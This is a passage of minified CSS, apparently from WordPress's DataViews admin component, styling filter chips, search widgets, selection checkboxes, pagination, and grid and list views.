tr td:last-child,.components-card__body:has(>.dataviews-wrapper) .dataviews-view-table tr th:last-child{ padding-inline-end:24px; } .dataviews-bulk-actions-footer__item-count{ color:#1e1e1e; font-size:11px; font-weight:500; text-transform:uppercase; } .dataviews-bulk-actions-footer__container{ margin-right:auto; min-height:32px; } .dataviews-filters__button{ position:relative; } .dataviews-filters__container{ padding-top:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true],.dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:hover{ opacity:0; } .dataviews-filters__reset-button.dataviews-filters__reset-button[aria-disabled=true]:focus{ opacity:1; } .dataviews-filters__summary-popover{ font-size:13px; line-height:1.4; } .dataviews-filters__summary-popover .components-popover__content{ border-radius:4px; max-width:250px; min-width:230px; width:100%; } .dataviews-filters__summary-popover.components-dropdown__content .components-popover__content{ padding:0; } .dataviews-filters__summary-operators-container{ padding:8px 16px; } .dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-listbox),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__search-widget-no-elements),.dataviews-filters__summary-operators-container:has(+.dataviews-filters__user-input-widget){ border-bottom:1px solid #e0e0e0; } .dataviews-filters__summary-operators-container:empty{ display:none; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-name{ color:#757575; flex-shrink:0; max-width:calc(100% - 55px); overflow:hidden; text-overflow:ellipsis; white-space:nowrap; } .dataviews-filters__summary-operators-container .dataviews-filters__summary-operators-filter-select{ overflow:hidden; white-space:nowrap; width:100%; } .dataviews-filters__summary-chip-container{ position:relative; white-space:pre-wrap; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip{ align-items:center; background:#f0f0f0; border:1px solid #0000; border-radius:16px; box-sizing:border-box; color:#2f2f2f; cursor:pointer; display:flex; min-height:32px; padding:4px 12px; position:relative; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable{ cursor:default; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-reset{ padding-inline-end:28px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:hover:not(.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.is-not-clickable),.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip[aria-expanded=true]{ background:#e0e0e0; color:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values{ background:rgba(var(--wp-admin-theme-color--rgb), .04); color:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values:hover,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip.has-values[aria-expanded=true]{ background:rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip .dataviews-filters-__summary-filter-text-name{ font-weight:500; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove{ align-items:center; background:#0000; border:0; border-radius:50%; cursor:pointer; display:flex; height:24px; justify-content:center; padding:0; position:absolute; right:4px; top:50%; transform:translateY(-50%); width:24px; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove svg{ fill:#757575; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover{ background:#e0e0e0; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus svg,.dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:hover svg{ fill:#1e1e1e; } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values svg{ fill:var(--wp-admin-theme-color); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove.has-values:hover{ background:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-filters__summary-chip-container .dataviews-filters__summary-chip-remove:focus-visible{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:none; } .dataviews-filters__search-widget-filter-combobox-list{ border-top:1px solid #e0e0e0; max-height:184px; overflow:auto; padding:4px; } .dataviews-filters__search-widget-filter-combobox-list .dataviews-filters__search-widget-filter-combobox-item-value [data-user-value]{ font-weight:600; } .dataviews-filters__search-widget-listbox{ overflow:auto; padding:4px; } .dataviews-filters__search-widget-listitem{ align-items:center; border-radius:2px; box-sizing:border-box; cursor:default; display:flex; font-family:-apple-system,"system-ui",Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; font-weight:400; gap:8px; line-height:20px; min-height:32px; padding:4px 12px; } .dataviews-filters__search-widget-listitem:last-child{ margin-block-end:0; } .dataviews-filters__search-widget-listitem:focus,.dataviews-filters__search-widget-listitem:hover,.dataviews-filters__search-widget-listitem[data-active-item]{ background-color:var(--wp-admin-theme-color); color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-description,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-description{ color:#fff; } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection{ background:#fff; border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-single-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection{ border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem:focus .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem:hover .dataviews-filters__search-widget-listitem-multi-selection.is-selected,.dataviews-filters__search-widget-listitem[data-active-item] .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color-darker-20, #183ad6); border-color:var(--wp-admin-theme-color-darker-20, #183ad6); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-description{ color:#757575; display:block; font-size:12px; line-height:16px; overflow:hidden; text-overflow:ellipsis; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ border:1px solid #1e1e1e; border-radius:50%; height:24px; margin-right:12px; max-width:24px; min-width:24px; position:relative; transition:none; width:24px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ height:16px; max-width:16px; min-width:16px; width:16px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ background-color:#fff; border:4px solid #fff; box-sizing:inherit; height:12px; left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection:checked{ background:var(--wp-admin-theme-color); border:none; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection{ margin:0; padding:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ background-color:#fff; border:4px solid #fff; border-radius:50%; box-sizing:inherit; content:""; height:12px; left:50%; margin:0; position:absolute; top:50%; transform:translate(-50%, -50%); width:12px; } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-single-selection.is-selected:before{ height:8px; width:8px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:24px; border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; margin-right:12px; padding:6px 8px; transition:none; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked::-ms-check{ opacity:0; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ color:#fff; margin:-3px -5px; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:checked:before,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ margin:-4px 0 0 -5px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ content:"\f460"; display:inline-block; float:left; font:normal 30px/1 dashicons; vertical-align:middle; width:16px; speak:none; -webkit-font-smoothing:antialiased; -moz-osx-font-smoothing:grayscale; } @media (min-width:782px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-checked=mixed]:before{ float:none; font-size:21px; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection:disabled,.dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection[aria-disabled=true]{ background:#f0f0f0; border-color:#ddd; cursor:default; opacity:1; } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ background:#fff; color:#1e1e1e; height:var(--checkbox-size); margin:0; padding:0; position:relative; width:var(--checkbox-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ --checkbox-size:16px; } } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection{ transition:border-color .1s ease-in-out; } } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected{ background:var(--wp-admin-theme-color, #3858e9); border-color:var(--wp-admin-theme-color, #3858e9); } .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:var(--checkbox-size); fill:#fff; height:var(--checkmark-size); left:50%; position:absolute; top:50%; transform:translate(-50%, -50%); width:var(--checkmark-size); } @media (min-width:600px){ .dataviews-filters__search-widget-listitem .dataviews-filters__search-widget-listitem-multi-selection.is-selected svg{ --checkmark-size:calc(var(--checkbox-size) + 4px); } } .dataviews-filters__search-widget-filter-combobox__wrapper{ padding:8px; position:relative; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; line-height:normal; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); outline:2px solid #0000; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-moz-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:-ms-input-placeholder{ color:#1e1e1e9e; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ display:block; font-size:16px; height:32px; margin-left:0; margin-right:0; padding:0 8px 0 32px; width:100%; } @media (min-width:600px){ .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input{ font-size:13px; } } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input:focus{ background:#fff; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::placeholder{ color:#757575; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-cancel-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-decoration,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-button,.dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__input::-webkit-search-results-decoration{ -webkit-appearance:none; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon{ align-items:center; bottom:0; display:flex; inset-inline-start:12px; justify-content:center; position:absolute; top:0; width:24px; } .dataviews-filters__search-widget-filter-combobox__wrapper .dataviews-filters__search-widget-filter-combobox__icon:dir(ltr){ transform:scaleX(-1); } .dataviews-filters__container-visibility-toggle{ flex-shrink:0; position:relative; } .dataviews-filters-toggle__count{ background:var(--wp-admin-theme-color, #3858e9); border-radius:8px; box-sizing:border-box; color:#fff; font-size:11px; height:16px; line-height:16px; min-width:16px; outline:var(--wp-admin-border-width-focus) solid #fff; padding:0 4px; position:absolute; right:0; text-align:center; top:0; transform:translate(50%, -50%); } .dataviews-search{ width:fit-content; } .dataviews-filters__user-input-widget{ padding:16px; } .dataviews-filters__user-input-widget .components-input-control__prefix{ padding-left:8px; } .dataviews-filters__search-widget-no-elements{ align-items:center; display:flex; justify-content:center; padding:16px; } .dataviews-footer{ background-color:#fff; border-top:1px solid #f0f0f0; bottom:0; flex-shrink:0; left:0; padding:12px 48px; position:sticky; } @media not (prefers-reduced-motion){ .dataviews-footer{ transition:padding .1s ease-out; } } .dataviews-footer{ z-index:2; } @container (max-width: 430px){ .dataviews-footer{ padding:12px 24px; } } @container (max-width: 560px){ .dataviews-footer{ flex-direction:column !important; } .dataviews-footer .dataviews-bulk-actions-footer__container{ width:100%; } .dataviews-footer .dataviews-bulk-actions-footer__item-count{ flex-grow:1; } .dataviews-footer .dataviews-pagination{ justify-content:space-between; width:100%; } } .dataviews-pagination__page-select{ font-size:11px; font-weight:500; text-transform:uppercase; } @media (min-width:600px){ .dataviews-pagination__page-select .components-select-control__input{ font-size:11px !important; font-weight:500; } } .dataviews-action-modal{ z-index:1000001; } .dataviews-picker-footer__bulk-selection{ align-self:flex-start; height:32px; } .dataviews-picker-footer__actions{ align-self:flex-end; } .dataviews-selection-checkbox{ --checkbox-input-size:24px; } @media (min-width:600px){ .dataviews-selection-checkbox{ --checkbox-input-size:16px; } } .dataviews-selection-checkbox{ flex-shrink:0; line-height:0; } .dataviews-selection-checkbox .components-checkbox-control__input-container{ margin:0; } .dataviews-view-config{ container-type:inline-size; font-size:13px; line-height:1.4; width:320px; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper{ height:100%; overflow-y:scroll; } .dataviews-config__popover.is-expanded .dataviews-config__popover-content-wrapper .dataviews-view-config{ width:auto; } .dataviews-view-config__sort-direction .components-toggle-group-control-option-base{ text-transform:uppercase; } .dataviews-settings-section__title.dataviews-settings-section__title{ font-size:15px; line-height:24px; } .dataviews-settings-section__sidebar{ grid-column:span 4; } .dataviews-settings-section__content,.dataviews-settings-section__content>*{ grid-column:span 8; } .dataviews-settings-section__content .is-divided-in-two{ display:contents; } .dataviews-settings-section__content .is-divided-in-two>*{ grid-column:span 4; } .dataviews-settings-section:has(.dataviews-settings-section__content:empty){ display:none; } @container (max-width: 500px){ .dataviews-settings-section.dataviews-settings-section{ grid-template-columns:repeat(2, 1fr); } .dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__content,.dataviews-settings-section.dataviews-settings-section .dataviews-settings-section__sidebar{ grid-column:span 2; } } .dataviews-field-control__field{ height:32px; } .dataviews-field-control__actions{ position:absolute; top:-9999em; } .dataviews-field-control__actions.dataviews-field-control__actions{ gap:4px; } .dataviews-field-control__field.is-interacting .dataviews-field-control__actions,.dataviews-field-control__field:focus-within .dataviews-field-control__actions,.dataviews-field-control__field:hover .dataviews-field-control__actions{ position:unset; top:unset; } .dataviews-field-control__icon{ display:flex; width:24px; } .dataviews-field-control__label-sub-label-container{ flex-grow:1; } .dataviews-field-control__label{ display:block; } .dataviews-field-control__sub-label{ color:#757575; font-size:11px; font-style:normal; margin-bottom:0; margin-top:8px; } .dataviews-view-grid-items{ container-type:inline-size; display:grid; gap:32px; grid-template-columns:repeat(auto-fill, minmax(230px, 1fr)); grid-template-rows:max-content; margin-bottom:auto; padding:0 48px 24px; } @container (max-width: 430px){ .dataviews-view-grid-items{ padding-left:24px; padding-right:24px; } } @media not (prefers-reduced-motion){ .dataviews-view-grid-items{ transition:padding .1s ease-out; } } .dataviews-view-grid .dataviews-view-grid__card{ height:100%; justify-content:flex-start; position:relative; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-actions{ padding:8px 0 4px; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field{ align-content:center; min-height:24px; overflow:hidden; text-align:start; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__title-field--clickable{ width:fit-content; } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ color:#1e1e1e; } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after,.dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ background-color:rgba(var(--wp-admin-theme-color--rgb), .08); } .dataviews-view-grid .dataviews-view-grid__card.is-selected .dataviews-view-grid__media:after{ box-shadow:inset 0 0 0 1px var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__card .dataviews-view-grid__media:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .dataviews-view-grid .dataviews-view-grid__media{ aspect-ratio:1/1; background-color:#fff; border-radius:4px; overflow:hidden; position:relative; width:100%; } .dataviews-view-grid .dataviews-view-grid__media img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-grid .dataviews-view-grid__media:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; pointer-events:none; position:absolute; top:0; width:100%; } .dataviews-view-grid .dataviews-view-grid__fields{ font-size:12px; line-height:16px; position:relative; } .dataviews-view-grid .dataviews-view-grid__fields:not(:empty){ padding:0 0 12px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field-value:not(:empty){ line-height:20px; min-height:24px; padding-top:2px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field{ align-items:center; min-height:24px; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-name{ color:#757575; overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:35%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field .dataviews-view-grid__field-value{ overflow:hidden; text-overflow:ellipsis; white-space:nowrap; width:65%; } .dataviews-view-grid .dataviews-view-grid__fields .dataviews-view-grid__field:not(:has(.dataviews-view-grid__field-value:not(:empty))){ display:none; } .dataviews-view-grid .dataviews-view-grid__badge-fields:not(:empty){ padding-bottom:12px; } .dataviews-view-grid__field-value:empty,.dataviews-view-grid__field:empty{ display:none; } .dataviews-view-grid__card .dataviews-selection-checkbox{ left:8px; opacity:0; position:absolute; top:-9999em; z-index:1; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-selection-checkbox{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-selection-checkbox{ opacity:1; top:8px; } } .dataviews-view-grid__card.is-selected .dataviews-selection-checkbox,.dataviews-view-grid__card:focus-within .dataviews-selection-checkbox,.dataviews-view-grid__card:hover .dataviews-selection-checkbox{ opacity:1; top:8px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions{ opacity:0; position:absolute; right:4px; top:4px; } .dataviews-view-grid__card .dataviews-view-grid__media-actions .dataviews-all-actions-button{ background-color:#fff; } @media not (prefers-reduced-motion){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ transition:opacity .1s linear; } } @media (hover:none){ .dataviews-view-grid__card .dataviews-view-grid__media-actions{ opacity:1; top:4px; } } .dataviews-view-grid__card .dataviews-view-grid__media-actions:has(.dataviews-all-actions-button[aria-expanded=true]),.dataviews-view-grid__card:focus-within .dataviews-view-grid__media-actions,.dataviews-view-grid__card:hover .dataviews-view-grid__media-actions{ opacity:1; } .dataviews-view-grid__media--clickable{ cursor:pointer; } .dataviews-view-grid__group-header{ color:#1e1e1e; container-type:inline-size; font-size:15px; font-weight:500; margin:0 0 8px; padding:0 48px; } @container (max-width: 430px){ .dataviews-view-grid__group-header{ padding-left:24px; padding-right:24px; } } div.dataviews-view-list{ list-style-type:none; } .dataviews-view-list{ margin:0 0 auto; } .dataviews-view-list div[role=article],.dataviews-view-list div[role=row]{ border-top:1px solid #f0f0f0; margin:0; } .dataviews-view-list div[role=article] .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row] .dataviews-view-list__item-wrapper{ box-sizing:border-box; padding:16px 24px; position:relative; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions{ display:flex; flex:0 0 auto; gap:4px; white-space:nowrap; width:max-content; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions .components-button,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions .components-button{ position:relative; z-index:1; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>div,.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>div{ height:24px; } .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex:0; overflow:hidden; width:0; } .dataviews-view-list div[role=article]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row]:where(.is-selected,.is-hovered,:focus-within) .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } @media (hover:none){ .dataviews-view-list div[role=article] .dataviews-view-list__item-actions>:not(:last-child),.dataviews-view-list div[role=row] .dataviews-view-list__item-actions>:not(:last-child){ flex-basis:min-content; overflow:unset; width:auto; } } .dataviews-view-list div[role=article].is-selected.is-selected,.dataviews-view-list div[role=article].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=article].is-selected.is-selected+div[role=row],.dataviews-view-list div[role=row].is-selected.is-selected,.dataviews-view-list div[role=row].is-selected.is-selected+div[role=article],.dataviews-view-list div[role=row].is-selected.is-selected+div[role=row]{ border-top:1px solid rgba(var(--wp-admin-theme-color--rgb), .12); } .dataviews-view-list div[role=article]:not(.is-selected) .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected) .dataviews-view-list__title-field{ color:#1e1e1e; } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered,.dataviews-view-list div[role=article]:not(.is-selected):focus-within,.dataviews-view-list div[role=article]:not(.is-selected):hover,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered,.dataviews-view-list div[role=row]:not(.is-selected):focus-within,.dataviews-view-list div[role=row]:not(.is-selected):hover{ background-color:#f8f8f8; color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=article]:not(.is-selected):hover .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected).is-hovered .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):focus-within .dataviews-view-list__title-field,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__fields,.dataviews-view-list div[role=row]:not(.is-selected):hover .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper{ background-color:rgba(var(--wp-admin-theme-color--rgb), .04); color:#1e1e1e; } .dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=article].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected .dataviews-view-list__item-wrapper .dataviews-view-list__title-field,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__fields,.dataviews-view-list div[role=row].is-selected:focus-within .dataviews-view-list__item-wrapper .dataviews-view-list__title-field{ color:var(--wp-admin-theme-color); } .dataviews-view-list .dataviews-view-list__item{ appearance:none; background:none; border:none; cursor:pointer; inset:0; padding:0; position:absolute; scroll-margin:8px 0; z-index:1; } .dataviews-view-list .dataviews-view-list__item:focus-visible{ outline:none; } .dataviews-view-list .dataviews-view-list__item:focus-visible:before{ border-radius:2px; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; inset:var(--wp-admin-border-width-focus); outline:2px solid #0000; position:absolute; } .dataviews-view-list .dataviews-view-list__title-field{ flex:1; line-height:24px; min-height:24px; overflow:hidden; } .dataviews-view-list .dataviews-view-list__title-field:has(a,button){ z-index:1; } .dataviews-view-list .dataviews-view-list__media-wrapper{ background-color:#fff; border-radius:4px; flex-shrink:0; height:52px; overflow:hidden; position:relative; width:52px; } .dataviews-view-list .dataviews-view-list__media-wrapper img{ height:100%; object-fit:cover; width:100%; } .dataviews-view-list .dataviews-view-list__media-wrapper:after{ border-radius:4px; box-shadow:inset 0 0 0 1px #0000001a; content:""; height:100%; left:0; position:absolute; top:0; width:100%; } 